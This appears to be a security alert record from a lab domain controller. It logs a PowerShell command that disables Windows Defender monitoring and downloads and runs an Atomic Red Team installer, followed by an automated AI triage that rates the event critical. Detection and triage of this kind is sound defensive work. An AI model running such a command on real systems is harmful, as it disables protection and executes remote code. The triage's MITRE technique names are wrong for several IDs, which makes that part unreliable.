{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1021.005 -CheckPrereqs ; Invoke-AtomicTest T1021.005 -GetPrereqs ; Invoke-AtomicTest T1021.005 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 155828224,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldB3A2.tmp.bat T1021.005 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8396,
        "THIS_ATOM": "d55d696523198bca24198fe369c2a848",
        "THREADS": 3,
        "TIMESTAMP": 1774364743439,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8396,
      "PROCESS_ID": 7484,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
      "event_time": 1774364744023,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2893,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "d55d696523198bca24198fe369c2a848",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "206ee127bfd4633f7821f3c569c2a84a"
    }
  },
  "detect_id": "75013f97-77ae-4ef1-ada2-02f769c2a84a",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364746922,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364744\u0026selected=206ee127bfd4633f7821f3c569c2a84a",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "4b0a0986-d73e-4eb4-b561-a59fbcb46da2",
    "event_time": 1774364744023,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2893,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "d55d696523198bca24198fe369c2a848",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "206ee127bfd4633f7821f3c569c2a84a"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364746000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.925,
  "false_positive_reason": null,
  "investigation_questions": [
    "What user or process initiated this command before it was executed by SYSTEM?",
    "Are there any scheduled tasks or startup items that could have triggered this execution?",
    "Has the host been connected to external networks recently?"
  ],
  "ioc_analysis": "The process is running PowerShell.exe but the command line arguments indicate malicious behavior: disabling real-time monitoring via Set-MpPreference, using IEX to download and execute code from an external source (GitHub), and invoking Atomic Red Team testing modules. While the file path is legitimate (System32) and the binary is signed, the context of execution (disabling security controls + remote code execution) overrides these benign indicators.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1021.005 (User Execution via Web Browser)"
    }
  ],
  "mitre_techniques": [
    "T1021.005 - User Execution via Web Browser",
    "T1567.001 - Exploitation of Remote Services",
    "T1568.001 - Abusing Elevation Control Mechanisms"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Isolate the host immediately to prevent lateral movement or data exfiltration.",
    "Block outbound traffic to raw.githubusercontent.com and redcanaryco domains at the network perimeter.",
    "Review recent PowerShell execution logs for other suspicious IEX commands.",
    "Check for persistence mechanisms installed alongside Atomic Red Team deployment."
  ],
  "risk_score": 88,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell commands designed to disable Windows Defender real-time protection and deploy the Atomic Red Team framework. The command line explicitly includes IEX (Invoke-Expression) with a remote URL from GitHub, which is a classic technique for downloading and executing arbitrary code.\n\n**IOC Analysis:** The process is running PowerShell.exe but the command line arguments indicate malicious behavior: disabling real-time monitoring via Set-MpPreference, using IEX to download and execute code from an external source (GitHub), and invoking Atomic Red Team testing modules. While the file path is legitimate (System32) and the binary is signed, the context of execution (disabling security controls + remote code execution) overrides these benign indicators.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nThe detection event involves a PowerShell process running as SYSTEM, attempting to disable Windows Defender real-time monitoring and install Atomic Red Team, which is commonly associated with red teaming and evasion techniques.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a legitimate system binary in its expected location and signed by Microsoft, making it unlikely to be malicious on its own. However, the command line includes suspicious actions such as disabling antivirus and downloading scripts from GitHub, indicating potential malicious intent.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}